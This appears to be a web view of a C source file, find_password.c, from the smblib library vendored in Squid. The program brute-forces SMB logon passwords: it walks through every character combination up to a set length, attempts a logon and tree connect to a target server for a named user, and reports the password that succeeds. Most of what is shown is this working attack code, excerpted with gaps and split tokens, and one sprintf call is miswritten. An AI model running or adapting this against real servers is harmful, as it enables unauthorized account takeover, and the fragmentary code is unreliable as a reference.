]>
git.ipfire.org Git - thirdparty/squid.git/blob - lib/smblib/find_password.c
2 /* Find passwords ... */
3 /* We do it in a brute force way ... Cycle through all the possible passwords
4 sending a logon to see if all it works ... We have to wait for any timeout
5 the the server implements before we try the next one. We could open lots
6 of connections to the server and then send the logon request and not wait
7 for the reply. This would allow us to have lots of outstanding attempts at
10 #include <sys/types.h>
16 #include "smblib/smblib.h"
21 char *SMB_Prots
[] = {"PC NETWORK PROGRAM 1.0",
22 "MICROSOFT NETWORKS 1.03",
23 "MICROSOFT NETWORKS 3.0",
35 fprintf(stderr
,"Usage: find_password -u <user> -l <pwd-len-max> server\n");
38 /* figure out next password */
40 static int pwinit
= FALSE
, pwpos
= 0;
42 int next_password(char *pw
, int pwlen
)
47 if (pwinit
== FALSE
) {
50 memset(pw
, 0, pwlen
+ 1);
61 /* If it has wrapped around, then inc to 1 and carry up the chain */
68 if (i
< 0) { /* If we went off the end, increment pwpos */
71 if (pwpos
>= pwlen
) return(FALSE
); /* No more passwords */
85 static char pwd_str
[1024]; /* Where we put passwords as we convert them */
87 char *print_password(char * password
)
95 for (i
= 0; i
< strlen(password
); i
++) {
97 if (((unsigned)password
[i
] <= ' ') || ((unsigned)password
[i
] > 127)) {
100 snprintf(temp
, sizeof(temp
)-1, "%03i", (int)password
[i
]);
101 strcpy(&pwd_str
[j
+ 1], temp
);
102 j
= j
+ 3; /* Space for \ accounted for below */
105 pwd_str
[j
] = password
[i
];
111 pwd_str
[j
] = 0; /* Put a null on the end ... */
117 main(int argc
, char *argv
[])
123 int opt
, error
, SMB_Error
, err_class
, err_code
, pwlen
, tries
= 0;
124 char server
[80], service
[80], service_name
[160], password
[80], username
[80];
125 char old_password
[80], err_string
[1024];
128 strncpy(service
, "IPC$", sizeof(service
) - 1);
134 while ((opt
= getopt(argc
, argv
, "s:u:l:v")) != EOF
) {
139 strcpy(service
, optarg
);
142 case 'u': /* Pick up the user name */
144 strncpy(username
, optarg
, sizeof(username
) - 1);
147 case 'l': /* pick up password len */
149 pwlen
= atoi(optarg
);
152 case 'v': /* Verbose? */
165 if (optind
< argc
) { /* Some more parameters, assume is the server */
166 strncpy(server
, argv
[optind
], sizeof(server
) - 1);
169 strcpy(server
, "nemesis");
172 if (verbose
== TRUE
) { /* Print out all we know */
174 fprintf(stderr
, "Finding password for User: %s, on server: %s\n",
176 fprintf(stderr
, "with a pwlen = %i\n", pwlen
);
180 SMB_Init(); /* Initialize things ... */
182 /* We connect to the server and negotiate */
184 con
= SMB_Connect_Server(NULL
, server
);
186 if (con
== NULL
) { /* Error processing */
188 fprintf(stderr
, "Unable to connect to server %s ...\n", server
);
190 if (SMB_Get_Last_Error() == SMBlibE_Remote
) {
192 SMB_Error
= SMB_Get_Last_SMB_Err();
193 SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error
),
194 SMBlib_Error_Code(SMB_Error
),
196 sizeof(err_string
) - 1);
199 SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string
, sizeof(err_string
) - 1);
202 printf(" %s\n", err_string
);
207 /* We need to negotiate a protocol better than PC NetWork Program */
209 if (SMB_Negotiate(con
, SMB_Prots
) < 0) {
211 fprintf(stderr
, "Unable to negotiate a protocol with server %s ...\n",
214 if (SMB_Get_Last_Error() == SMBlibE_Remote
) {
216 SMB_Error
= SMB_Get_Last_SMB_Err();
217 SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error
),
218 SMBlib_Error_Code(SMB_Error
),
220 sizeof(err_string
) - 1);
223 SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string
, sizeof(err_string
) - 1);
226 printf(" %s\n", err_string
);
231 sprintf(service_name
, sizeof(service_name
)-1, "\\\\%s\\%s", server
, service
); /* Could blow up */
233 /* Now loop through all password possibilities ... */
235 memset(password
, 0, sizeof(password
));
237 while (next_password(password
, pwlen
) == TRUE
) {
239 if ((tree
= SMB_Logon_And_TCon(con
,
243 service_name
, "?????")) == NULL
) {
245 if (verbose
== TRUE
) { /* Lets hear about the error */
247 fprintf(stderr
, "Unable to logon and tree connect to server %s ...\n",
249 fprintf(stderr
, "With username: %s, and password: %s\n",
250 username
, print_password(password
));
252 if (SMB_Get_Last_Error() == SMBlibE_Remote
) {
254 SMB_Error
= SMB_Get_Last_SMB_Err();
255 SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error
),
256 SMBlib_Error_Code(SMB_Error
),
258 sizeof(err_string
) - 1);
261 SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string
, sizeof(err_string
) - 1);
264 printf(" %s\n", err_string
);
267 } else { /* Password match */
269 fprintf(stderr
, "Logged in with password:%s\n",
270 print_password(password
));
280 fprintf(stderr
, "Passwords exhausted.");